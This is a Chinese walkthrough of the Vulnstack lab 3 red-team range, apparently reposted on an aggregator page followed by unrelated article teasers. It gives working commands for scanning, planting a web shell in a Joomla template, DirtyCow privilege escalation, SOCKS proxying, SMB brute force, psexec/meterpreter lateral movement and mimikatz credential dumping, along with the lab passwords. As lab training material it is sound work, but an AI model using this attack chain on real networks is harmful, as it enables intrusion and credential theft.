ATTCK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场

文章目录

  • 环境配置
    • 靶场介绍
    • 靶场设置
  • 外网渗透
    • 信息收集
      • 端口扫描
      • 目录扫描
    • 漏洞发现与利用
      • 获取ssh账号密码,登录centos
    • 提权
  • 内网渗透
    • 建立代理
    • 内网信息收集
    • smb暴破,获取本地管理员密码
  • 横向移动
    • 使用psexec模块上线msf

环境配置

靶场介绍

靶场地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。

挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。

除重新获取ip,不建议进行任何虚拟机操作。

参考虚拟机网络配置,添加新的网络,该网络作为内部网络。

注:名称及网段必须符合下面图片,进行了固定ip配置。

靶场设置

网络配置要求,攻击机kali为net8,外网的centos其中一个为net8,另一个net2
在这里插入图片描述

拓扑图(这里我的kali为192.168.1.5)

在这里插入图片描述

外网渗透

信息收集

端口扫描

使用nmap进行端口,服务,操作系统探测

nmap -sS -P0 -sV -O 192.168.1.110

得到目标开放了22,80和3306
在这里插入图片描述
访问一下目标的80端口,看到是个joomla CMS搭建的网站,脚本语言为php
在这里插入图片描述

目录扫描

dirb http://192.168.1.110/

发现目标存在admin目录
在这里插入图片描述
访问一下是个后台的登录界面,弱口令进不去
在这里插入图片描述

漏洞发现与利用

使用msf获取joomla cms相关信息

use auxiliary/scanner/http/joomla_version
set rhosts http://192.168.1.110/
run

得到具体版本,没啥用,不能利用
在这里插入图片描述
上御剑,扫一下后台,发现一大堆东西
phpinfo()
在这里插入图片描述
mysql配置信息
在这里插入图片描述
navicat远程连接mysql,看到管理员密码被加密了
在这里插入图片描述
这里可以根据官方文档,修改添加管理员账号密码
如何恢复或重置管理员密码?

这里注意表的名字改成你自己的
在这里插入图片描述

登录后台

http://192.168.1.103/administrator/index.php  admin2  secret

getshell

点击
extensions-->templates-->templates-->protostar details and files-->index.php-->save

写入蚁剑shell
在这里插入图片描述
连接成功
在这里插入图片描述
命令执行发现用不了,php开启了禁用函数
在这里插入图片描述
使用蚁剑插件绕过函数禁用
在这里插入图片描述

获取ssh账号密码,登录centos

看下目录里面有没有有用的信息,发现一个账号密码,前期信息收集知道开放了22端口,远程连接试一下
在这里插入图片描述
连接成功
在这里插入图片描述

提权

uname -r 发现linux内核版本很低,可以用脏牛提权

https://github.com/imust6226/dirtcow

靶机里vi dirty.c,直接将上面dirty.c里的内容复制进去,编译一下

gcc -pthread dirty.c -o dirty -lcrypt

在这里插入图片描述

./dirty 123456  ---执行exp创建账户:firefart,密码:123456

切换到firefart账户,获取root权限
在这里插入图片描述

内网渗透

建立代理

掏出祖传的EW(earthworm),上传到靶机并执行,让靶机当做进入内网的跳板
在这里插入图片描述
kali里记得修改一下走靶机地址

vim /etc/proxychains.conf  //配置proxychains将最后一行的socks4注释掉,添加下面的行,端口为跳板机上的ew监听的8888:socks5  192.168.1.100 8888

内网信息收集

直接上神器fscan

在这里插入图片描述

由此可以看出:

已经拿到root权限的centos:有两张网卡 一张是192.168.216.131 一张是192.168.93.100

Nginx代理服务器ubantu:192.168.93.120

一台非TEST域内win7专业版主机:192.168.93.30

一台TEST域内win2008主机:192.168.93.20

一台TEST域控主机win server 2012:192.168.93.10

还跑出来了疑似的SSH账号,尝试登录发现不正确,挂代理尝试登录

smb暴破,获取本地管理员密码

这里我的字典里没有这个密码,我手动加上去的,20,30都是这个密码

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.30
set smbuser administrator
set pass_file top10k.txt
run

暴破密码:administrator 123qwe!ASD
在这里插入图片描述

横向移动

使用psexec模块上线msf

use exploit/windows/smb/psexec
set rhost 192.168.93.30
set payload windows/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
run

拿下win7
在这里插入图片描述
拿下win2008
在这里插入图片描述
接下来通过msf上传mimikatz,进行密码读取

#提升权限
privilege::debug抓取密码
lsadump::lsa /patch

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/23682.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

pid算法C语言实现

理论我就不多说了,网都已经很多了,但能直接看到效果的确不多。这里我就提供一个C语言实现的可以看到效果的实际例程。 pid.h #ifndef __PID_H #define __PID_Htypedef struct pid {int error_last;int error_last_last;float kp;float ki;f…

cookie/sessionStorage/localStorage 的区别

cookie/sessionStorage/localStorage 的区别 cookie、sessionStorage、localStorage 都是保存本地数据的方式 其中,cookie 兼容性较好,所有浏览器均支持。浏览器针对 cookie 会有一些默认行为,比如当响应头中出现set-cookie字段时&#xff0c…

剑指Offer 20.表示数值的字符串

20.表示数值的字符串 题目 官方地址 代码(正则表达式) public boolean isNumeric (String str) {if (str null || str.length() 0)return false;return new String(str).matches("[-]?\\d*(\\.\\d)?([eE][-]?\\d)?"); }在给定的代码…

PCIE链路信息

目录 简介: 目的: 详情: 简介: PCIe有很多寄存器,也有很多控制,包括链路状态信息,上一节我们讲到了PCie的链路训练,这节文章将继续学习PCIe相关知识。 目的: 从设计…

【Python从小白到高手】---函数基础

个人主页:平行线也会相交 欢迎 点赞👍 收藏✨ 留言✉ 加关注💓本文由 平行线也会相交 原创 收录于专栏【Python小白从入门到精通】🎈 本专栏旨在分享学习Python的一点学习心得,欢迎大家在评论区讨论💌 目录…

iPhone 6透明屏是什么?原理、特点、优势

iPhone 6透明屏是一种特殊的屏幕技术,它能够使手机屏幕变得透明,让用户能够透过屏幕看到手机背后的物体。 这种技术在科幻电影中经常出现,给人一种未来科技的感觉。下面将介绍iPhone 6透明屏的原理、特点以及可能的应用。 iPhone 6透明屏的原…

本地 shell无法连接centos 7 ?

1、首先检查是否安装ssh服务; yum list installed | grep openssh-server# 没有安装尝试安装下 yum install openssh-server 2、检查ssh服务是否开启 systemctl status sshd.service# 未开启,开启下 systemctl start sshd.service # 将sshd 服务添…

socker套接字

1.打印错误信息 2.socketaddr_in结构体 结构体: (部分库代码) (宏中的##) 3.manual TCP: SOCK_STREAM : 提供有序地,可靠的,全双工的,基于连接的流式服务 UDP: 面向数据报

406 · 和大于S的最小子数组

链接:LintCode 炼码 - ChatGPT!更高效的学习体验! 题解:同向双指针 九章算法 - 帮助更多程序员找到好工作,硅谷顶尖IT企业工程师实时在线授课为你传授面试技巧 class Solution { public:/*** param nums: an array …

《Java面向对象程序设计》学习笔记——第 5 章 继承与接口

​专栏:《Java面向对象程序设计》学习笔记 第 5 章 类与对象 5.1 子类与父类 有新类继承一般类视频讲解的状态和行为,并根据需要增加新的状态和行为。 由继承得到的类称为子类,被继承的类称为父类(超类)。 Java 不…

【maven】构建项目前clean和不clean的区别

其实很简单,但是百度搜了一下,还是没人能简单说明白。 搬用之前做C项目时总结结论: 所以自己在IDE里一遍遍测试程序能否跑通的时候,不需要clean,因为反正还要改嘛。 但是这个项目测试好了,你要打成jar包给…

element-tree-line el-tree 添加结构线 添加虚线

概览:给element组件添加上虚线,通过使用插件element-tree-line 参考连接: 参考别人的博客 安装插件: # npm npm install element-tree-line -S # yarn yarn add element-tree-line -S main.js全局注册引入插件: imp…

Python批量查字典和爬取双语例句

最近,有网友反映,我的批量查字典工具换到其它的网站就不好用了。对此,我想说的是,互联网包罗万象,网站的各种设置也有所不同,并不是所有的在线字典都可以用Python爬取的。事实上,很多网站为了防…

Linux文本三剑客---grep、sed、awk

目录标题 1、grep1.1 命令格式1.2命令功能1.3命令参数1.4grep实战演练 2、sed2.1 认识sed2.2命令格式2.3常用选项options2.4地址定界2.5 编辑命令command2.6用法演示2.6.1常用选项options演示2.6.2地址界定演示2.6.3编辑命令command演示 3、awk3.1认识awk3.2常用命令选项3.3awk…

向表中随机插入字符串数据

已知表 向该表中插入指定次数的随机字符串: 代码如下: DROP PROCEDURE sc //CREATE PROCEDURE sc(num INT) BEGIN DECLARE str VARCHAR(26) DEFAULT "abcdefghijklmnopqrstuvwxyz"; DECLARE cnt INT DEFAULT 0; DECLARE startIndex INT DEFAULT 1; DE…

线程、进程的区别

线程、进程的区别 在开发中,我们经常听到线程和进程两个概念,它们都是操作系统的基本概念,操作系统以进程为基本单位分配存储器,以线程为基本单位分配CPU。虽然它们有很多相似之处,但是它们也有很大的区别。本文将详细…

msvcp120.dll丢失的解决方法(亲测可修复方的法)

在运行某些软件的时候,计算机提示msvcp120.dll丢失,无法打开运行软件。在第一次遇到这个问题的时候,相信很多人都不知道是怎么回事。下面小编把msvcp120.dll是什么以及如何解决这个问题的详细方法给大家科普一下。 问题描述: 在使…

00-Hadoop入门

Hadoop入门 Hadoop四高 1)高可靠性 Hadoop底层维护多个数据副本,所有即使hadoop某个计算元素或存储故障,也不会造成数据丢失 2)高扩展性 在集群间分配任务数据,可方便的扩展数以千计的节点 3)高效性 …

Ubuntu安装MySQL 8.0与Navicat

目录 Ubuntu安装MySQL 8.0 1、更新软件包列表 2、安装 MySQL 8.0 3、启动 MySQL 服务 5、确保MySQL服务器正在运行 5、root 用户的密码 6、登录MySQL,输入mysql密码 7、MySQL默认位置 Ubuntu安装Navicat 1、下载 Navicat 2、额外的软件包 3、执行命令 U…

周末在家值班,解决几个月前遗忘的Bug

问题: 周末被迫在家值班,无聊之际打开尘封已久的Bug清单,发现有Bug拖了几个月还没解决… 场景是这样子的,有个功能是拿Redis缓存热点数据进行展示,暂且称它为功能A,有个另外的功能B,它会去更新缓…